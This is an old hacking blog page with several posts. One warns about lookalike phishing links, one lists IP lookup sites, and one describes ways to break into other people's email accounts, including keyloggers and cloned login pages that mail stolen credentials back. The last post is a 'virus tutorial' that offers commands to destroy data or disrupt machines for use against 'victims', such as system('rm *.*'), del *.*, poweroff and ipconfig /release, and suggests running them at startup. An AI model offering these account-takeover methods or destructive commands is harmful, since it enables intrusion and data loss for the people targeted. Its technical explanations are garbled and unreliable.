Friday, June 15, 2012

Hacking Through Links

This is called as phishing. Though this method is popular in mails. Mails contain link that show some thing but point to some other site all together some thing like this .

http:/www.google.com /

This will direct you to goooole.com instead to google.com. Also note the change in link the actual link has to be http:// (second "/").


This could take you into some other site orkut.com link. Another popular thing is "http://www.okrut.com/GLogin". Did found any change. No. See again. The spelling of orkut.

This will take you into some page that looks same as original but is different site all together. So if you click on a hyperlink that asks you to login check the site's address however familar it looks. So be careful.


Source : http://viruswriting.blogspot.com/

Hack Email ( yahoo / msn / aol / gmail and lot more)

Most of us are interested in hacking some one's email(mostly buddies or family members). If you want to know how to "Hack email" by both the safe(no offense way) and the "you go to jail" way then read along. all are simple but effective ways to hack emails . Solts start hacking emails

There are several ways you can achieve this let me show you all.

  • Read email without hacking --  This is 100% soafe . If you are simply inerested in reading someone's email then you can achive this wihout hacking. Check out this post on Hacking emials: Read emails . The problem with this method is you cant read email of secure mails like Yahoo, Gmail, msn, Aol  or of most commonly used mail providers. This  is best for reading mails of organisations that maintain their own server wich are not secure and of mails send to small websites/blogs via forms that may not be sent securely
  • Using password recovery -- This may have tough requirements but is the best method.If you wnat to get some one's password you can use a password recovery software. This too is partially safe as the softwares are not illegal but if you misuse it 's a crime. You can check out this post onhacking using password recovry softwares
  • Using  Keylogger -- A keyloggger is a software that records all you keystrokes. It is used by admins to moniter the system since it records all keystrokes it will also record sensitive info. As above using keylogger is n ot illegal but misusing the result is crime. (more details comming soon)
  • Phishing/Craeting fake pages   --  You can trick some one into entering his info at a fake page created by you. This is punishable offense and you will get at least 1 year sentence. Jsut creat a clone copy of that page with a form intsead of a login box that mails the details to you. Check out this post oncreating fake pages

This article is purely for knowledge sake and we dont intent to spread havoc. None of us have ever hacked into anyone's account expect may be for our own.


Source : http://viruswriting.blogspot.com/

IP Gives It All

Most people wonder how do websites come to know of your location from IP.Now you too can find out.Forget users you can even sneak up on websites. Just enter IP/URL/mailid and vola all the details of are given.


Just visit visualroute . This has some great tools that will help you. You can enter IP/URL/Domain name and much more.

Here is a pic of what it can do (click on pic for a larger image). It gives your location. who is your internet provider, how you are connected to him.
(click for larger image)

This software costs about 60$. What if you dont want to buy the software you can use the lite version. This give only how the data is sent., how are you connected yo him

visual route
(click for larger image)


What if you dont want to download any thing. then there are some online tools

  • Samspade.org
  • net4domain.com
  • visualware.com and more.

Virus Code Tutorial

Virus code can be coded using several language. The best being c or vbs or dos. Today I teach some basic virus codings. I will be using c, dos and alp/asm(assembly language).These is a very simple Virus coding tutorial just a beginners guide

this is mainly for programmers. this post is just to change their thinking. First lets begin with tiny and simple ones.I will show both codes for windows and linux

First alp/asm
back: add c,b
loop back

This simple script needs no explanation. It will just be eating away your victims memory at a slow space. As you know addition needs some space to store intermediate result. this will be using up the ram. but very less of ram is lost and the user can stop this by just closing the .exe file. As you know a float addition takes up more space than normal addition . You can replace integer addition with float.


Now lets try to create a simple Linux virus in c.

system("poweroff");

This simple script will turn off your victims comp. Now if you can forece this script to load at start up then it will be a nightmare.

let's see one more linux virus of the same type
system("rm *.*");

This will all files with all extension which the user has previlage to delete.Just imagine if the admin runs it then it will create a havoc.

Lets see the same codes for windows.

To delete all files in windows using dos/batch progtraming will be
del *.*
and the code of the shutdown virus will be just shutdown

Now lets disable Internet

ipconfig /release
echo You Internet Been HACKED!


What if you change the extension of a file. It becomes useless.Now let's rename a few file.
rename(old_file_name_with_path,newname");
Now what you can do with this left up to you.Just use your brain and you will make out it's potential.

These are very simple virus just a beginners guide. Just check out the virus codes section for more complex and full fledged Virus coding tutorial. Please dont misuse these virus codes in c